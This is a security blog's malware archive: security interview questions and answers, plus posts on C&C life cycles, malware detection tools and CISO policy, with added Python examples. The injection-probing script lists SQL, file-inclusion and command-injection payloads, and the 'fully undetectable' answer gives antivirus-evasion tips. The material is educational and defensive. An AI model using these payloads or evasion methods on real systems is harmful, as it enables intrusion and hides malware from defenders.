
Archive for the ‘Malware’ Category

9 Essential System Security Interview Questions

1. What is a pentest?

“Pentest” is short for “penetration test”: a trusted security expert attacks a system, with authorisation, in order to discover and fix security vulnerabilities before malicious attackers can exploit them. This is a critical procedure for securing a system, because the alternative way of discovering vulnerabilities is to wait for unknown parties to exploit them, by which time it is, of course, too late to do anything about them.

To keep a system secure it is advisable to pentest regularly, and in particular whenever new technology is added to the stack or a vulnerability is disclosed in a component you already run.


2. What is social engineering?

“Social engineering” refers to using humans as the attack vector to compromise a system. It involves fooling or otherwise manipulating personnel into revealing information or performing actions on the attacker’s behalf. Social engineering is a very effective attack strategy, since even the strongest security system can be undone by a single poor decision. In some cases, highly secure systems that cannot be penetrated by technical or cryptographic means can be compromised simply by phoning a member of the target organization and impersonating a colleague or an IT professional.

Common social engineering techniques include phishing, pretexting (such as the phone call above) and baiting; clickjacking-style UI tricks are often lumped in as well, although several other tricks are at an attacker’s disposal. Infected USB drives are widely reported to have been how the Stuxnet worm reached the isolated systems of Iran’s Natanz uranium enrichment facility, where it damaged centrifuges and set back the country’s ability to produce nuclear material.

For more information, a good read is Christopher Hadnagy’s book Social Engineering: The Art of Human Hacking.

3. You find parameters passed openly in the URL of a PHP application, such as /index.php?page=userID. What would you then be looking to test?

This is an ideal situation for injection testing. The parameter is clearly fed into server-side logic: a name like page= suggests it selects a file or template to include, and a value like a user ID suggests it ends up in a database query. If we know the server is using a database such as MySQL behind a PHP controller, the job becomes quite easy. We would test how the server reacts to many different kinds of requests and what it sends back, looking for anomalies and errors: SQL error messages, changed response sizes, timing differences, or file contents that should never be served.

One example is code injection. If the parameter is passed to eval() or to a shell without validation, one could simply request /index.php?page=1;system('id') and see whether the host returns the output of the id command. The same parameter would also be tried with a single quote (SQL injection) and with a path such as ../../etc/passwd (local file inclusion).
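The probing routine described in this answer, as an added example that is not part of the Toptal article. It sends one payload per vulnerability class (SQL injection, file inclusion, code injection) and classifies each response by known error signatures and by deviation from a baseline request. The target host, the `fake_fetch` stand-in for HTTP and all response bodies are constructed so the script runs offline; replace `fake_fetch` with a real GET only against a system you are authorised to test.

```python
"""Probe one URL parameter for injection classes and classify the responses."""
import re
from urllib.parse import unquote_plus, urlencode

# Payloads grouped by the vulnerability class each one probes. A `page=`
# parameter suggests a file include (LFI); an ID suggests a database lookup
# (SQLi); an eval()-style handler is probed with PHP code.
PAYLOADS = {
    "sqli": ["'", "1 OR 1=1", "1' AND SLEEP(0)-- -"],
    "lfi": ["../../../../etc/passwd",
            "php://filter/convert.base64-encode/resource=index.php"],
    "rce": ["1;system('id')"],
}

# Response signatures that betray each class. A status change or a large
# deviation from the baseline body is reported too, as an anomaly to inspect.
INDICATORS = {
    "sqli": [re.compile(r"You have an error in your SQL syntax", re.I),
             re.compile(r"Warning: mysql", re.I),
             re.compile(r"unclosed quotation mark", re.I)],
    "lfi": [re.compile(r"root:x:0:0:"),
            re.compile(r"failed to open stream", re.I)],
    "rce": [re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+")],
}

BASELINE = "<html><body>Welcome, user 42</body></html>"


def fake_fetch(url):
    """Constructed stand-in for an HTTP GET against a vulnerable index.php.
    Swap in urllib.request.urlopen() for a host you are authorised to test."""
    value = unquote_plus(url.split("page=", 1)[1]) if "page=" in url else ""
    if "'" in value:  # quote breaks the SQL statement -> database error leaks
        return 500, ("Warning: mysql_fetch_array(): You have an error in your "
                     "SQL syntax near ''' at line 1")
    if "etc/passwd" in value:  # include() served an arbitrary file
        return 200, ("root:x:0:0:root:/root:/bin/bash\n"
                     "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin")
    if "system(" in value:  # parameter reached eval() -> command output
        return 200, "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
    return 200, BASELINE


def probe(base_url, param, fetch=fake_fetch):
    """Return {vuln_class: [(payload, [reasons...]), ...]} for payloads that
    produced a signature match, a status change or a length anomaly."""
    base_status, base_body = fetch(f"{base_url}?{urlencode({param: '42'})}")
    findings = {}
    for vuln_class, payloads in PAYLOADS.items():
        for payload in payloads:
            status, body = fetch(f"{base_url}?{urlencode({param: payload})}")
            reasons = [p.pattern for p in INDICATORS[vuln_class] if p.search(body)]
            if status != base_status:
                reasons.append(f"status {base_status}->{status}")
            elif not reasons and abs(len(body) - len(base_body)) > len(base_body):
                reasons.append("response length anomaly")
            if reasons:
                findings.setdefault(vuln_class, []).append((payload, reasons))
    return findings


if __name__ == "__main__":
    for cls, hits in probe("http://target.example/index.php", "page").items():
        for payload, reasons in hits:
            print(f"[{cls}] {payload!r}: {', '.join(reasons)}")
```

Signatures alone miss blind cases (no error text, identical body), which is why the baseline comparison is kept separately: a time-based SQL payload, for instance, would show up as a latency anomaly rather than a string match.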

4. You find yourself in an airport in the depths of a foreign superpower. You’re out of mobile broadband and don’t trust the Wi-Fi. What do you do? Further, what are the potential threats from open Wi-Fi?

Ideally you want all of your traffic to pass through an encrypted tunnel before it touches the local network. That usually means bringing up a VPN to a trusted endpoint, or at minimum tunnelling whatever outside service you need through SSH, and refusing to use anything that will not go through the tunnel. Otherwise you are exposed to every attack an open network allows: passive sniffing of unencrypted traffic, man-in-the-middle attacks from a rogue or “evil twin” access point, DNS spoofing, and captive portals that harvest credentials or push malicious content.

5. What does it mean for a machine to have an “air gap”? Why are air gapped machines important?

An air-gapped machine is simply one that has no connection to any outside network: no internet, no intranet, and no wireless links such as Bluetooth or Wi-Fi either.

Air-gapped machines are isolated from other computers and are important for storing sensitive data or carrying out critical tasks that must be immune from outside interference. For example, a nuclear power plant should be operated from computers behind a full air gap. In practice, many nominally air-gapped computers are still connected to some internal network to make data transfer and process execution easier; however, every connection increases the risk that outside actors will be able to penetrate the system.


6. You’re tasked with setting up an email encryption system for certain employees of a company. What’s the first thing you should be doing to set them up? How would you distribute the keys?

The first task is to do a full clean and make sure the employees’ machines are not compromised in any way. This usually involves a selective backup: take only the essential files from the computer and copy them to a clean replica of the new host. Give the replica an internet connection and watch for any suspicious outgoing or incoming activity. Then perform a full secure erase of the employee’s original machine, wiping everything down to the last bit, before finally restoring the backed-up files.

The keys should then be handed out over a channel with no other connections, such as a dedicated machine or removable device used only for this purpose. Import each employee’s certificate and private key (usually a PKCS#12 .p12/.pfx bundle; the .p7s files that accompany signed mail are S/MIME signatures, not certificates) into a trusted email client, then securely delete every trace of the key material on the originating computer. Have recipients confirm the certificate fingerprint out of band before trusting it.

The first step, cleaning the computers, may seem long and laborious. In theory, if you are 100% certain that a machine is in no way affected by malicious code, there is no need for such a process. In most cases, however, you will never know this for sure, and if any machine has been backdoored in any way, setting up secure email on it will have been done in vain.

7. You manage to capture email packets from a sender that are encrypted through Pretty Good Privacy (PGP). What are the most viable options to circumvent this?

First, consider whether to attempt circumventing the encryption directly at all. Decryption is practically impossible unless you already have the private key: a PGP message is encrypted with a random session key, which is in turn encrypted to the recipient’s public key, so without the private key you would have to factor a 2048-bit RSA modulus or brute-force the session key, either of which would keep your computer busy for many lifetimes. It is far easier to compromise an end node (the sender or the receiver). This could involve phishing, exploiting the sending host to recover the private key and its passphrase, or compromising the receiver so that the emails can be read as plain text.

8. What makes a script fully undetectable (FUD) to antivirus software? How would you go about writing a FUD script? 

A script is FUD to an antivirus when it can infect a target machine and operate without that AV noticing it. This usually means a script that is simple, small and precise.

To write a FUD script, one must understand what the targeted antivirus is actually looking for: byte-pattern signatures, known file hashes, and heuristics on suspicious behaviour. If the script performs obviously hostile operations such as hooking the keyboard, deleting files or copying files (the Hook_Keyboard(), File_Delete() and File_Copy() of the original answer stand for these), it is very likely to be picked up by antivirus scanners, so such calls are avoided or disguised. FUD scripts also mask function names with common names used in the industry rather than names like fToPwn1337(). A talented attacker might split the payload into smaller chunks and hex-edit each one so that no single chunk matches a known signature, which is exactly why hash- and signature-based detection alone is insufficient.

As antivirus software becomes more sophisticated, attackers respond in kind. Antivirus software such as McAfee is much harder to fool now than it was 10 years ago, yet there are talented hackers everywhere who are more than capable of writing fully undetectable scripts, and who will continue to do so. Virus protection is very much a cat-and-mouse game.

9. What is a “Man-in-the-Middle” attack?

A man-in-the-middle attack is one in which the attacker secretly relays, and possibly alters, the communication between two parties who believe they are talking directly to each other. One example is active eavesdropping: the attacker makes independent connections with both victims and relays messages between them so that each believes it is talking directly to the other over a private connection, when in fact the attacker controls the entire conversation and can modify the content of each message. Often abbreviated MITM or MitM (and sometimes loosely called session hijacking, though that term properly refers to stealing an already established session), it succeeds whenever the attacker can impersonate each party to the satisfaction of the other, which is why authenticating the endpoints (certificate validation, key fingerprints, SSH host keys) is the defence. MITM attacks pose a serious threat because they let the attacker capture and manipulate sensitive information in real time while posing as a trusted party during transactions, conversations and data transfers. This is straightforward in many circumstances; for example, an attacker within reception range of an unencrypted Wi-Fi access point can insert himself as a man-in-the-middle.
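The impersonation this answer describes, as an added example that is not part of the Toptal article: an unauthenticated Diffie-Hellman exchange in which “Mallory” substitutes her own public value in both directions, ends up holding one key with Alice and a different key with Bob, and can therefore decrypt, read and re-encrypt everything between them. The group parameters are a deliberately small toy choice for illustration, and the out-of-band fingerprint check at the end is the generic form of what certificate validation or SSH host-key pinning provides.

```python
"""Unauthenticated Diffie-Hellman with an active man-in-the-middle, and the
out-of-band fingerprint check that exposes it."""
import hashlib
import secrets

# Toy group for illustration only: the Mersenne prime 2**127 - 1 with generator 2.
# Real deployments use a standardised group (RFC 3526 / RFC 7919) or ECDH.
P = 2**127 - 1
G = 2
NBYTES = 16  # every group element fits in 16 bytes


def keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def shared_key(priv, peer_pub):
    """KDF over the DH secret; two honest parties land on the same bytes."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(NBYTES, "big")).digest()


def fingerprint(pub):
    """Short digest of a public value, the kind people read out over the phone."""
    return hashlib.sha256(pub.to_bytes(NBYTES, "big")).hexdigest()[:16]


def handshake(channel):
    """Alice and Bob swap public values through `channel`, which may tamper.
    Returns what each party derived and what each party actually received."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    bob_saw = channel("A->B", a_pub)    # Alice's value as delivered to Bob
    alice_saw = channel("B->A", b_pub)  # Bob's value as delivered to Alice
    return {
        "alice_key": shared_key(a_priv, alice_saw),
        "bob_key": shared_key(b_priv, bob_saw),
        "alice_pub": a_pub, "bob_pub": b_pub,
        "alice_saw": alice_saw, "bob_saw": bob_saw,
    }


def honest_channel(direction, pub):
    """A channel that delivers values unchanged."""
    return pub


class Mallory:
    """Active attacker: swaps in her own public value in both directions and
    ends up holding one key with Alice and another with Bob."""

    def __init__(self):
        self.priv, self.pub = keypair()
        self.key_with_alice = None
        self.key_with_bob = None

    def relay(self, direction, pub):
        if direction == "A->B":
            self.key_with_alice = shared_key(self.priv, pub)
        else:
            self.key_with_bob = shared_key(self.priv, pub)
        return self.pub  # each victim now shares a key with Mallory, not the peer


def verify_out_of_band(result):
    """Compare the fingerprint each side received with the peer's true value.
    This is what an SSH known_hosts entry, a PGP fingerprint read over the phone
    or a CA-signed TLS certificate provides; without it the swap is invisible."""
    return (fingerprint(result["alice_saw"]) == fingerprint(result["bob_pub"])
            and fingerprint(result["bob_saw"]) == fingerprint(result["alice_pub"]))


if __name__ == "__main__":
    ok = handshake(honest_channel)
    print("honest: keys match =", ok["alice_key"] == ok["bob_key"],
          "| fingerprints verify =", verify_out_of_band(ok))
    mallory = Mallory()
    bad = handshake(mallory.relay)
    print("mitm:   keys match =", bad["alice_key"] == bad["bob_key"],
          "| mallory holds both =", mallory.key_with_alice == bad["alice_key"]
          and mallory.key_with_bob == bad["bob_key"],
          "| fingerprints verify =", verify_out_of_band(bad))
```

Nothing in the exchange itself tells Alice or Bob that anything is wrong; both derive a key and both can talk. Only comparing what they received against an independently trusted value reveals the substitution, which is the whole reason unauthenticated key agreement is never used on its own.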

This article is from Toptal.

Most Aggressively Spreading Malware Binaries

Hello again!
With that live list you can search various sites for the MD5 hashes and file names and keep updated regarding what those malware are and how they are spreading in your network.
This site is my bible for malware searching and fighting.


Roy Coren
Security Specialist
Roycoren AT gmail.com

Malware Fighting Tools/Guides – Part 3: Down and Dirty

Before we start, I just want to declare that the things I publish here are based on my experience only, and in no way should you take them as advice to buy or not to buy specific products.
After covering the essentials of a CISO’s work, I’ll expand on how I did the research work from Part 1 alongside my incident response team from Part 2.
Regarding the tools I mentioned earlier: they need to give you a FULL, bottom-up view of every request or connection to the internet, from the user’s endpoint through the firewall/proxy and DNS, and cross-correlate the findings into a positive catch.
C&C life cycle:

1) A hostile file is downloaded from “some” website, or gets onto a computer through an exposed browser hole.
By the way, the hostile file can be an apparently legitimate skype.exe that was downloaded NOT from Skype’s website…

2) If step 1 succeeded and no AV engine stopped it, the hostile file “sniffs” its way around your organization, trying to elevate privileges and gather as much information as it can before moving to phase II.

3) After getting some idea of how your organization “works”, the hostile file tries to get out and connect to its operator’s site. This phase is usually known as domain fluxing and shows up as bursts of DNS lookups for random names such as aabbccdd.<your company’s domain extension> or any other random sequence; most of them fail (NXDOMAIN), because only a few of the generated names are actually registered by the operator at any time.
At this step, if you have implemented the right products, the hostile activity should be blocked at your gateway by IDS/IPS, firewall, proxy, URL filtering, DLP or any other PREVENTION product.
If it isn’t, and you have to look at step 4, chances are you are in deep trouble…

4) Also known as phase II: the hostile file and its operator evolve into one unit that is fully aware of how your organization works and can exploit almost any aspect of your INTERNAL network.
This includes admin users, passwords, emails, internal IPs, DCs, DNS, AD and even firewall configuration data.
This allows the attacker, or shall we say “your commander”, to do whatever he likes with your data. 1-0 to the bad guys…
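The phase-3 signal described above, as an added example that is not part of this post: a detector that reads resolver log lines, keeps only NXDOMAIN answers for names whose leftmost label looks machine-generated (long, high-entropy, digit-heavy), and raises an alert when one client produces a burst of them inside a short window. The log format, the client addresses and the domain names are constructed for the example; adapt the `LINE` regex to your own DNS server’s log layout.

```python
"""Flag hosts that burst NXDOMAIN lookups for generated-looking names."""
import math
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample resolver log: timestamp, client IP, queried name, rcode.
# 10.1.2.7 shows the domain-flux pattern; the other clients are normal noise.
SAMPLE_LOG = """\
2013-04-02T10:00:01 10.1.2.3 www.microsoft.com NOERROR
2013-04-02T10:00:02 10.1.2.3 mail.example.com NOERROR
2013-04-02T10:00:05 10.1.2.7 xk3qv9dlw2pzt.info NXDOMAIN
2013-04-02T10:00:05 10.1.2.7 q8zrt1kvbmp0ye.biz NXDOMAIN
2013-04-02T10:00:06 10.1.2.7 w0plmzx4yq7cdh.com NXDOMAIN
2013-04-02T10:00:06 10.1.2.7 jd7cqv2xmr9zt.net NXDOMAIN
2013-04-02T10:00:07 10.1.2.7 b4yzq0wk3xlm8p.org NXDOMAIN
2013-04-02T10:00:08 10.1.2.7 zx19kqmv7tpw3.info NXDOMAIN
2013-04-02T10:00:40 10.1.2.9 update.skype.com NOERROR
2013-04-02T10:00:50 10.1.2.9 zq8x3mvk1tpl0.com NXDOMAIN
2013-04-02T10:01:10 10.1.2.3 intranet.example.com NXDOMAIN
"""
LINE = re.compile(r"^(\S+) (\S+) (\S+) (NOERROR|NXDOMAIN|SERVFAIL)$")


def entropy(s):
    """Shannon entropy in bits per character of the string s."""
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def looks_generated(name, min_entropy=3.3, min_len=10):
    """Heuristic for an algorithmically generated leftmost label. Thresholds are
    assumptions for the example; tune them against your own traffic."""
    label = name.split(".")[0]
    if len(label) < min_len:
        return False
    digits = sum(ch.isdigit() for ch in label)
    return entropy(label) >= min_entropy or digits >= 3


def detect_domain_flux(log_text, window_seconds=60, threshold=5):
    """Return {client: [names]} for clients with >= threshold generated-looking
    NXDOMAIN lookups inside any window of window_seconds."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, client, name, rcode = m.groups()
        if rcode == "NXDOMAIN" and looks_generated(name):
            events[client].append((datetime.fromisoformat(ts), name))
    alerts = {}
    for client, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over the sorted events
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                alerts[client] = [n for _, n in evs[start:end + 1]]
                break
    return alerts


if __name__ == "__main__":
    for client, names in detect_domain_flux(SAMPLE_LOG).items():
        print(f"{client}: possible domain fluxing, e.g. {', '.join(names[:3])}")
```

A single failed lookup (the 10.1.2.9 line) is not enough to alert on; the burst per client is the signal, and the same logic applies to proxy logs if your resolver does not log rcodes.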
The first question you might ask is: if my AV vendor is not discovering the bad guys, what can I do?
Well, a good one… this brings me back to my friend’s original request once again. And the answer is:
No AV vendor is “the one”. It is enough to look at sites like VirusTotal or URLQuery to see that even 10 AV engines together can miss, therefore you need special tools for these special jobs.
Or worse, if you trust your AV vendor as your sole security solution, change your job…
It has got to be a best-of-breed set of solutions that answers your dynamic organization’s requests and whims.
They MUST be able to do the following in order to crossfire any hostile file in your environment.

Also make sure your IRT team is using them and their results on a daily basis; in fact, base your security protocols and procedures on their output.

1) Security Information and Event Management (SIEM): [such as ArcSight, Symantec, RSA]
Connect every available and relevant device to your SIEM and write basic rules.
Improve those rules as you go, and remember: those devices can archive almost everything that happened on your network fairly easily; it is the correlation between those events that makes your life easier.


2) A cross-stream analyzer: [such as Damballa Failsafe, FireEye, the Websense full suite, advanced proxy/URL filtering]
This device’s sole purpose is to analyze the data from the endpoint to the DNS server / proxy / firewall and correlate it into one valid event.
As I explained in the C&C life cycle, it is essential to expose the hostile file before phase II, meaning that if you can catch one machine (or asset) trying to contact a hostile URL or doing domain fluxing, then phase II won’t be an issue for you.
Hell, you can even have these connections terminated automatically, or trigger an event-based action on your remediation device.


3) Investigating tool: [such as Silicium ECAT, HBGary Responder, or even GMER or Comodo CCE]
It MUST HAVE the “cross-platform approach”, meaning it runs across your whole enterprise as a natural endpoint agent, collecting ALL your computers’ and servers’ files into one place, analyzing them and giving you suspected or convicted files.
The methods should be as follows:

a) Compare your files’ hashes (MD5/SHA-1) against several databases such as Bit9, NIST (the NSRL), MSDN, or any other cloud-based comparison engine (HitmanPro, CCE), and check their code signatures.
This will bring up all the files that carry no valid signature chaining to a root CA, or no company name embedded in them, so that only sealed, authentic files reside on your machines.
Any other result, such as unknown files or a broken certificate chain, can imply that the file has been tampered with by another hostile that may take additional steps, such as injecting DLLs into other processes/services, loading a rootkit, or connecting to additional C&C sites.

b) Use several AV engines, or upload the suspicious files from section (a) to sites like VirusTotal and similar. You can even search the web for the MD5 string and consult other people’s findings on your specific hash.

c) Analyze floating code and hash memory regions on the live system; injected code lives in memory, not on disk.

d) Create your OWN whitelist of the files your organization’s software developers produce, and direct them to work as methodically as they can.

e) Check your current network connections from the process up.
Meaning: if you can see EXCEL.EXE reaching out to the internet, it is NOT looking for an update from Microsoft…
Even a simple netstat -nab can give you the desired results (the -b switch, which names the owning executable, needs an elevated prompt on Windows).

f) Use a good URL filtering / anti-bot engine. This should actually be the first dot in the line of crossfire, since you will most probably get an alert from your URL filtering device saying one machine tried to reach a hostile website. You can also consult many other online URL checking tools.
A good tool in this category has to be one that updates as quickly as it can, since automated cleanups of those websites happen almost within the hour, so before you block access to it from your domain, make sure the danger hasn’t already passed…
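Two of the steps above, (a) hash lookup and (e) process-to-connection review, as an added example that is not part of this post. The known-good and known-bad hash sets stand in for the NSRL, Bit9 or VirusTotal lookups the post mentions, the netstat -nab output is constructed, and the list of applications that should never talk to the internet is an assumption to tune per environment.

```python
"""Endpoint triage: hash lookup of files and netstat -nab connection review."""
import hashlib
import ipaddress
import re

# --- (a) hash lookup --------------------------------------------------------
# Constructed known-good / known-bad sets. Real lists hold millions of hashes;
# the decision logic is the same.
GOOD_SAMPLE = b"MZ\x90\x00 constructed bytes of a legitimate binary"
BAD_SAMPLE = b"MZ\x90\x00 constructed bytes of a known dropper"
KNOWN_GOOD = {hashlib.sha256(GOOD_SAMPLE).hexdigest()}
KNOWN_BAD = {hashlib.sha256(BAD_SAMPLE).hexdigest()}


def classify_file(data):
    """'convicted' beats 'known-good'; anything else is 'unknown' and goes on to
    multi-engine scanning or VirusTotal (step b)."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in KNOWN_BAD:
        return "convicted"
    if digest in KNOWN_GOOD:
        return "known-good"
    return "unknown"


# --- (e) netstat -nab review ------------------------------------------------
# Constructed Windows netstat -nab output: each connection line is followed by
# the owning executable in brackets, or by an ownership error without -b rights.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    10.1.2.7:49211         203.0.113.5:443        ESTABLISHED
 [EXCEL.EXE]
  TCP    10.1.2.7:49212         192.0.2.44:443         ESTABLISHED
  Can not obtain ownership information
  TCP    10.1.2.7:49213         93.184.216.34:80       ESTABLISHED
 [chrome.exe]
  TCP    10.1.2.7:49214         198.51.100.9:8080      ESTABLISHED
 [svchost.exe]
  TCP    10.1.2.7:49215         10.1.2.1:445           ESTABLISHED
 [System]
"""
CONN = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s+(\S+)")
OWNER = re.compile(r"^\s*\[(.+)\]\s*$")
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
NO_INTERNET = {"excel.exe", "winword.exe", "powerpnt.exe"}  # assumption: tune per site
WEB_PORTS = {"80", "443"}


def parse_netstat(text):
    """Return one dict per connection, with the owning process when known."""
    conns, current = [], None
    for line in text.splitlines():
        m = CONN.match(line)
        if m:
            current = {"proto": m.group(1), "remote": m.group(4),
                       "rport": m.group(5), "state": m.group(6), "process": None}
            conns.append(current)
            continue
        m = OWNER.match(line)
        if m and current is not None:
            current["process"] = m.group(1)
    return conns


def suspicious_connections(conns):
    """Flag external connections that an analyst should look at first."""
    findings = []
    for c in conns:
        try:
            remote = ipaddress.ip_address(c["remote"].strip("[]"))
        except ValueError:  # "*" or a hostname: nothing to classify
            continue
        if any(remote in net for net in INTERNAL):
            continue
        proc = c["process"]
        if proc is None:
            findings.append((proc, c["remote"], c["rport"],
                             "owner unknown: rerun elevated, then suspect a rootkit"))
        elif proc.lower() in NO_INTERNET:
            findings.append((proc, c["remote"], c["rport"],
                             "office application talking to the internet"))
        elif c["rport"] not in WEB_PORTS:
            findings.append((proc, c["remote"], c["rport"], "non-web port"))
    return findings


if __name__ == "__main__":
    for sample in (GOOD_SAMPLE, BAD_SAMPLE, b"MZ\x90\x00 something else"):
        print(hashlib.sha256(sample).hexdigest()[:12], classify_file(sample))
    for proc, remote, port, why in suspicious_connections(parse_netstat(NETSTAT_SAMPLE)):
        print(f"{proc or '<unknown>'} -> {remote}:{port}: {why}")
```

The two halves feed each other: a process flagged by the connection review is exactly the binary whose hash you then push through the lookup and, if it comes back unknown, on to the multi-engine scan.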

From there you can start your query using all the tools and methods I have mentioned: the more conclusive results you get about an evil residing on a machine, the better.

This approach is NOT bulletproof, but it will definitely filter out 95%+ of your hostile files, therefore keep up with the technology and bring the human resource into the game.



Roy Coren

Security Specialist

Roycoren AT gmail.com

Malware Fighting Tools/Guides – Part 2: How to be an Ace CISO

If one of my customers came to me today and asked me to design a full method to eliminate unwanted or dangerous files from his domain, I would say “no such thing”.

One of the reasons is that you can’t keep your sensitive environment clean enough without damaging users’ freedom and productivity. Especially VPs’.

Most of the time CISOs and IT managers come to me AFTER somebody has made a 207 or 207A on their domain (that’s the police code for kidnapping); in that case you have a legal mandate and usually a very big Go! from the CTO/CEO to do everything you can to stop it from happening again.

Those are good times for software vendors and integrators, who can celebrate a 100% sell rate at those companies.

But, as you guessed, those time-pressed CISOs are not always aware of which products to implement and, most important, which technology will give them the best results per dime for the longest time. Having said that, without the right consultant who will take Pain and turn it into Gain, they usually invest in the wrong methods.

Getting back to the original “bug free” request: in those special cases I would recommend a full revision of the company’s approach to data security, starting from the bottom up.

Implementing a good, solid, management-backed data security policy is not something that happens in a day, but it is worth putting in a lot of effort: start something good and harvest the applause later.

Issues to consider:

– Have every user sign that the computer/software he gets from the company is NOT his own.

– Publish a list of allowed software in your organization, stating that anything besides that list will cause issues with the HR department…

– Start by classifying and identifying your:

1) Sensitive data: “Show me your data and I’ll tell you how to protect it.”

In most cases you will find that they DO NOT know where it is or how much of it there is… this step alone takes several months to complete.

2) Weakest points in the LAN / WAN / DMZ.

3) Everyday data flow: this is the stream that all problems start from.

4) Human resources: gather and assess your team, see if it needs additional knowledge, and whether it can handle 911 calls alongside everyday tasks.

In most cases you will find 1 or 2 people doing 5 people’s jobs. This is not the situation you want to be in when implementing a large DLP or SIEM project, only to realize your team can’t make sense of the results or lacks the time to do it.

– Harden security policies for mobile users: have smartphones and laptops follow strict rules and policies without losing the dynamics of work productivity.

– Offer well-known, foolproof, productive solutions for the issues above. You can start by drilling down into your AD GPOs and dead users, continue with your AV kill rate, and then your main firewall rules and block ratio.

– Keep your software up to date: probably the best tip I can give. No holes, no foxes…

– Assign virtual “data owners”: have them take responsibility for their data in terms of backup and unwanted access.

– Pick as few tools and solutions as possible for all the scenarios you can imagine. When the 911 call arrives, the first thing you need is to act as fast as possible, and you will want the best results, outcomes, logs and products refined and distilled on your desktop.

Now you can start thinking about wide projects like DLP, endpoint security, SIEM, virtual security, IDS/IPS and, most important, a decent monitoring system, or any other solution your organization needs; just make sure it fits your golden rules above.

With the output of those products, you can assign an incident response team to be the task force for all kinds of alarms and events.

And since you will get tens of millions of events per day, if this team can handle 10 REAL security events per day, you have scored it! Ace!

See you in Part 3…

Roy Coren

Security Specialist

Roycoren AT gmail.com

Malware Fighting Tools/Guides

I have done some massive research and long-term deep investigations, and this Check Point Anti-Bot module has a very high percentage of accuracy on live malware and C&C communications residing on machines.
Those tools helped me along the way to deal with and remove those evils in a haystack (besides the obvious Format c: /q).
It also has a knowledge base containing everything you need to know about those evils and their families.
For more information on the methodology of my research and the tools I used, you can write to my email.


Roy Coren,
Security Specialist
Roycoren AT gmail.com